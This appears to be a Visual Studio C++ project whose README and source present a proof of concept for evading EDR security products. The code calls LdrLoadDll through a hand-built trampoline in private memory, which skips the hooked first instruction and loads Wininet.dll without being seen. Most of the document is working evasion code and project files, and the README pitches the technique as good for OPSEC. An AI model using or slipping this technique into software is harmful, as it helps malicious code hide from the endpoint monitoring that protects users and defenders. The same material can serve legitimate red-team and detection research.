├── unhookLdrLoadDll
    ├── unhookLdrLoadDll.vcxproj.user
    ├── unhookLdrLoadDll.vcxproj.filters
    ├── unhookLdrLoadDll.cpp
    └── unhookLdrLoadDll.vcxproj
├── README.md
└── unhookLdrLoadDll.sln


/unhookLdrLoadDll/unhookLdrLoadDll.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # LdrLoadDll-Unhooking
2 | 
3 | This is a proof of concept of bypassing(unhooking) the hook of potential EDRs, in using an unhooked version of LdrLoadDll to load DLLs.  
4 | This is basically a reroute of the initial instruction of LdrLoadDll that will be executed in private memory and then reroute back into the normal code of LdrLoadDll,  
5 | Which is better for OPSEC since, all the calls looks like they are coming directly from the NTDLL anyway.  
6 | Why did I make this? Certain NTDLL export functions do not follow the SYSCALL procedure, hence this specific function like a few others need to be handled in a different manner.
7 | 


--------------------------------------------------------------------------------
/unhookLdrLoadDll/unhookLdrLoadDll.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="unhookLdrLoadDll.cpp">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 | </Project>


--------------------------------------------------------------------------------
/unhookLdrLoadDll.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.31729.503
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "unhookLdrLoadDll", "unhookLdrLoadDll\unhookLdrLoadDll.vcxproj", "{77D06D83-C7E6-4034-996C-D35C90A5174B}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{77D06D83-C7E6-4034-996C-D35C90A5174B}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{77D06D83-C7E6-4034-996C-D35C90A5174B}.Debug|x64.Build.0 = Debug|x64
18 | 		{77D06D83-C7E6-4034-996C-D35C90A5174B}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{77D06D83-C7E6-4034-996C-D35C90A5174B}.Debug|x86.Build.0 = Debug|Win32
20 | 		{77D06D83-C7E6-4034-996C-D35C90A5174B}.Release|x64.ActiveCfg = Release|x64
21 | 		{77D06D83-C7E6-4034-996C-D35C90A5174B}.Release|x64.Build.0 = Release|x64
22 | 		{77D06D83-C7E6-4034-996C-D35C90A5174B}.Release|x86.ActiveCfg = Release|Win32
23 | 		{77D06D83-C7E6-4034-996C-D35C90A5174B}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {32F18F81-5722-42D6-AEE9-8A600EEBE260}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/unhookLdrLoadDll/unhookLdrLoadDll.cpp:
--------------------------------------------------------------------------------
  1 | #include <Windows.h>
  2 | #include <stdio.h>
  3 | 
  4 | #define OBJ_CASE_INSENSITIVE 0x00000040L
  5 | 
  6 | 
  7 | typedef struct _UNICODE_STRING {
  8 | 	USHORT Length;
  9 | 	USHORT MaximumLength;
 10 | 	PWSTR  Buffer;
 11 | } UNICODE_STRING, * PUNICODE_STRING;
 12 | 
 13 | 
 14 | typedef struct _OBJECT_ATTRIBUTES {
 15 | 	ULONG           Length;
 16 | 	HANDLE          RootDirectory;
 17 | 	PUNICODE_STRING ObjectName;
 18 | 	ULONG           Attributes;
 19 | 	PVOID           SecurityDescriptor;
 20 | 	PVOID           SecurityQualityOfService;
 21 | } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
 22 | 
 23 | #define InitializeObjectAttributes( i, o, a, r, s ) {    \
 24 |       (i)->Length = sizeof( OBJECT_ATTRIBUTES );         \
 25 |       (i)->RootDirectory = r;                            \
 26 |       (i)->Attributes = a;                               \
 27 |       (i)->ObjectName = o;                               \
 28 |       (i)->SecurityDescriptor = s;                       \
 29 |       (i)->SecurityQualityOfService = NULL;              \
 30 |    }
 31 | 
 32 | using pNewLdrLoadDll = NTSTATUS(NTAPI*)(PWCHAR PathToFile, ULONG Flags, PUNICODE_STRING ModuleFileName, PHANDLE ModuleHandle);
 33 | 
 34 | 
 35 | PVOID CCopyMemory(PVOID Destination, CONST PVOID Source, SIZE_T Length)
 36 | {
 37 | 	PBYTE D = (PBYTE)Destination;
 38 | 	PBYTE S = (PBYTE)Source;
 39 | 
 40 | 	while (Length--)
 41 | 		*D++ = *S++;
 42 | 
 43 | 	return Destination;
 44 | }
 45 | 
 46 | SIZE_T StringLengthW(LPCWSTR String)
 47 | {
 48 | 	LPCWSTR String2;
 49 | 
 50 | 	for (String2 = String; *String2; ++String2);
 51 | 
 52 | 	return (String2 - String);
 53 | }
 54 | 
 55 | VOID RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString)
 56 | {
 57 | 	SIZE_T DestSize;
 58 | 
 59 | 	if (SourceString)
 60 | 	{
 61 | 		DestSize = StringLengthW(SourceString) * sizeof(WCHAR);
 62 | 		DestinationString->Length = (USHORT)DestSize;
 63 | 		DestinationString->MaximumLength = (USHORT)DestSize + sizeof(WCHAR);
 64 | 	}
 65 | 	else
 66 | 	{
 67 | 		DestinationString->Length = 0;
 68 | 		DestinationString->MaximumLength = 0;
 69 | 	}
 70 | 
 71 | 	DestinationString->Buffer = (PWCHAR)SourceString;
 72 | }
 73 | 
 74 | int main()
 75 | {
 76 | 	pNewLdrLoadDll LdrLoadrDll;
 77 | 	UNICODE_STRING ldrldll;
 78 | 	OBJECT_ATTRIBUTES objectAttributes = { 0 };
 79 | 	wchar_t ldrstring[] = L"Wininet.dll";
 80 | 	
 81 | 	//Obtaining LdrLoadDll Address from loaded NTDLL
 82 | 	RtlInitUnicodeString(&ldrldll, ldrstring);
 83 | 	InitializeObjectAttributes(&objectAttributes, &ldrldll, OBJ_CASE_INSENSITIVE, NULL, NULL);
 84 | 	LPVOID origLdrLoadDll = GetProcAddress(GetModuleHandleA("ntdll.dll"),"LdrLoadDll");
 85 | 	
 86 | 	//Setting up the structure of the trampoline for the instructions
 87 | 	unsigned char jumpPrelude[] = { 0x49, 0xBB };
 88 | 	unsigned char jumpAddress[] = { 0xDE, 0xAD, 0xBE, 0xEF, 0xDE, 0xAD, 0xBE, 0xEF };
 89 | 	unsigned char jumpEpilogue[] = { 0x41, 0xFF, 0xE3, 0xC3 };
 90 | 	LPVOID jmpAddr = (void*)((char*)origLdrLoadDll + 0x5);
 91 | 	*(void**)(jumpAddress) = jmpAddr;
 92 | 	
 93 | 	//Allocating the memory for the strcture and its instructions
 94 | 	LPVOID trampoline = VirtualAlloc(NULL,19, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
 95 | 	printf("Address of trampoline at 0x%p\n", trampoline);
 96 | 	printf("Original LdrLoadDll at 0x%p\n",origLdrLoadDll);
 97 | 	printf("Original jmp Address at 0x%p\n", jmpAddr);
 98 | 	
 99 | 	//Copying the original instruction mov qword ptr [rsp+10h],rbx in the trampoline and jumping back to the rest of the execution for LdrLoadDll
100 | 	CCopyMemory(trampoline,(PVOID)"\x48\x89\x5c\x24\x10", 5);
101 | 	//Setting up the JMP address in the original LdrLoadDll
102 | 	CCopyMemory((PBYTE)trampoline+5, jumpPrelude, 2);
103 | 	CCopyMemory((PBYTE)trampoline + 5 + 2, jumpAddress, sizeof(jumpAddress));
104 | 	CCopyMemory((PBYTE)trampoline + 5 + 2 + 8, jumpEpilogue, 4);
105 | 	
106 | 	//Making the Allocated memory executable RX
107 | 	DWORD oldProtect = 0;
108 | 	VirtualProtect(trampoline,30,PAGE_EXECUTE_READ,&oldProtect);
109 | 	LdrLoadrDll = (pNewLdrLoadDll)trampoline;
110 | 	
111 | 	//Loading Wininet.dll
112 | 	HANDLE wininetmodule = NULL;
113 | 	LdrLoadrDll(NULL, 0 , &ldrldll, &wininetmodule);
114 | }
115 | 


--------------------------------------------------------------------------------
/unhookLdrLoadDll/unhookLdrLoadDll.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{77d06d83-c7e6-4034-996c-d35c90a5174b}</ProjectGuid>
 25 |     <RootNamespace>unhookLdrLoadDll</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v142</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v142</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v142</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v142</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 77 |     <LinkIncremental>false</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 80 |     <LinkIncremental>true</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <SDLCheck>true</SDLCheck>
 89 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 90 |       <ConformanceMode>true</ConformanceMode>
 91 |     </ClCompile>
 92 |     <Link>
 93 |       <SubSystem>Console</SubSystem>
 94 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 95 |     </Link>
 96 |   </ItemDefinitionGroup>
 97 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 98 |     <ClCompile>
 99 |       <WarningLevel>Level3</WarningLevel>
100 |       <FunctionLevelLinking>true</FunctionLevelLinking>
101 |       <IntrinsicFunctions>true</IntrinsicFunctions>
102 |       <SDLCheck>true</SDLCheck>
103 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
104 |       <ConformanceMode>true</ConformanceMode>
105 |     </ClCompile>
106 |     <Link>
107 |       <SubSystem>Console</SubSystem>
108 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
109 |       <OptimizeReferences>true</OptimizeReferences>
110 |       <GenerateDebugInformation>true</GenerateDebugInformation>
111 |     </Link>
112 |   </ItemDefinitionGroup>
113 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
114 |     <ClCompile>
115 |       <WarningLevel>Level3</WarningLevel>
116 |       <SDLCheck>true</SDLCheck>
117 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
118 |       <ConformanceMode>true</ConformanceMode>
119 |     </ClCompile>
120 |     <Link>
121 |       <SubSystem>Console</SubSystem>
122 |       <GenerateDebugInformation>true</GenerateDebugInformation>
123 |     </Link>
124 |   </ItemDefinitionGroup>
125 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
126 |     <ClCompile>
127 |       <WarningLevel>Level3</WarningLevel>
128 |       <FunctionLevelLinking>true</FunctionLevelLinking>
129 |       <IntrinsicFunctions>true</IntrinsicFunctions>
130 |       <SDLCheck>true</SDLCheck>
131 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
132 |       <ConformanceMode>true</ConformanceMode>
133 |     </ClCompile>
134 |     <Link>
135 |       <SubSystem>Console</SubSystem>
136 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
137 |       <OptimizeReferences>true</OptimizeReferences>
138 |       <GenerateDebugInformation>true</GenerateDebugInformation>
139 |     </Link>
140 |   </ItemDefinitionGroup>
141 |   <ItemGroup>
142 |     <ClCompile Include="unhookLdrLoadDll.cpp" />
143 |   </ItemGroup>
144 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
145 |   <ImportGroup Label="ExtensionTargets">
146 |   </ImportGroup>
147 | </Project>


--------------------------------------------------------------------------------